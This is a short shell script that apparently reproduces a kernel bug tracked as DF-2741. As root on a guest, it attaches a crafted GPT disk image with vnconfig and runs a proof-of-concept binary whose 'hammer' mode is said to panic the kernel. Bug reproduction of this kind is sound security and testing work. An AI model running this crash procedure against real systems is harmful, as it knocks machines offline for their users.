#!/bin/sh
# DF-2741 run (guest, as root)
vnconfig -c /dev/vn0 /root/gpt.img
sleep 1
./poc2741 /dev/vn0 info          # shows nslices=130 vs declared 16
./poc2741 /dev/vn0 hammer        # panics the kernel within ~1 min
